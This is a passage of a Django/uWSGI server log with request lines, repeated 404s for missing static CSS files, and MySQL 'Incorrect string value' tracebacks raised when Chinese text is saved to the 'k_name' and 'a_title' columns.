msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 937/1220] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:50:01 2021] GET /static/css/spinners.css => generated 3516 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 938/1221] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:50:01 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 940/1222] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:50:07 2021] GET /kind-manage/? => generated 7366 bytes in 40 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 941/1223] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 942/1224] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 943/1225] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 944/1226] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 945/1227] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 946/1228] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 947/1229] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:50:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 948/1230] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:50:08 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 949/1231] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:50:08 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 949/1232] 180.160.72.163 () {48 vars in 1026 bytes} [Thu Jan 14 08:50:07 2021] POST /kind-manage/ => generated 207014 bytes in 250 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 950/1233] 180.160.72.163 () {40 vars in 933 bytes} [Thu Jan 14 08:50:12 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 951/1234] 180.160.72.163 () {38 vars in 885 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 952/1235] 180.160.72.163 () {38 vars in 897 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 953/1236] 180.160.72.163 () {38 vars in 889 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 954/1237] 180.160.72.163 () {38 vars in 853 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 955/1238] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 956/1239] 180.160.72.163 () {38 vars in 873 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 24 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 957/1240] 180.160.72.163 () {38 vars in 929 bytes} [Thu Jan 14 08:50:13 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 958/1241] 180.160.72.163 () {38 vars in 821 bytes} [Thu Jan 14 08:50:13 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 959/1242] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:50:13 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 960/1243] 61.129.6.145 () {32 vars in 589 bytes} [Thu Jan 14 08:50:23 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 961/1244] 61.129.6.227 () {32 vars in 512 bytes} [Thu Jan 14 08:50:27 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[] +[pid: 11057|app: 0|req: 962/1245] 61.129.6.174 () {32 vars in 587 bytes} [Thu Jan 14 08:52:06 2021] GET /all-3-0-0 => generated 8106 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1246] 61.129.6.174 () {34 vars in 589 bytes} [Thu Jan 14 08:52:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1247] 61.129.6.174 () {34 vars in 566 bytes} [Thu Jan 14 08:53:33 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1248] 61.129.6.174 () {34 vars in 587 bytes} [Thu Jan 14 08:53:53 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1249] 61.129.6.174 () {34 vars in 604 bytes} [Thu Jan 14 08:54:42 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1250] 61.129.6.174 () {34 vars in 679 bytes} [Thu Jan 14 08:55:22 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1251] 61.129.6.174 () {34 vars in 595 bytes} [Thu Jan 14 08:55:42 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 11057|app: 0|req: 963/1252] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:58:27 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 964/1253] 219.228.146.156 () {40 vars in 921 bytes} [Thu Jan 14 08:58:31 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 965/1254] 219.228.146.156 () {48 vars in 1018 bytes} [Thu Jan 14 08:58:44 2021] POST /my-admin/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 966/1255] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 08:58:47 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1256] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1257] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1258] 219.228.146.156 () {40 vars in 874 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1259] 219.228.146.156 () {40 vars in 891 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1260] 219.228.146.156 () {40 vars in 903 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 11057|app: -1|req: -1/1261] 219.228.146.156 () {40 vars in 909 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 967/1262] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 968/1263] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 969/1264] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 970/1265] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 971/1266] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 972/1267] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 973/1268] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 974/1269] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 975/1270] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: -1|req: -1/1271] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1272] 219.228.146.156 () {40 vars in 843 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1273] 219.228.146.156 () {40 vars in 855 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1274] 219.228.146.156 () {40 vars in 931 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1275] 219.228.146.156 () {40 vars in 853 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: -1|req: -1/1276] 219.228.146.156 () {40 vars in 927 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 11057|app: 0|req: 976/1277] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 08:58:50 2021] GET /announcement/ => generated 7421 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 977/1278] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 978/1279] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 979/1280] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 980/1281] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 981/1282] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 982/1283] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 983/1284] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 984/1285] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 08:58:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 985/1286] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 08:58:50 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /announcement/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\x85\\xAC\\xE7\\xBA\\xA6' for column 'a_title' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 477, in announcement + models.Announcement.objects.create(a_title=a_title, a_content=a_content) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File 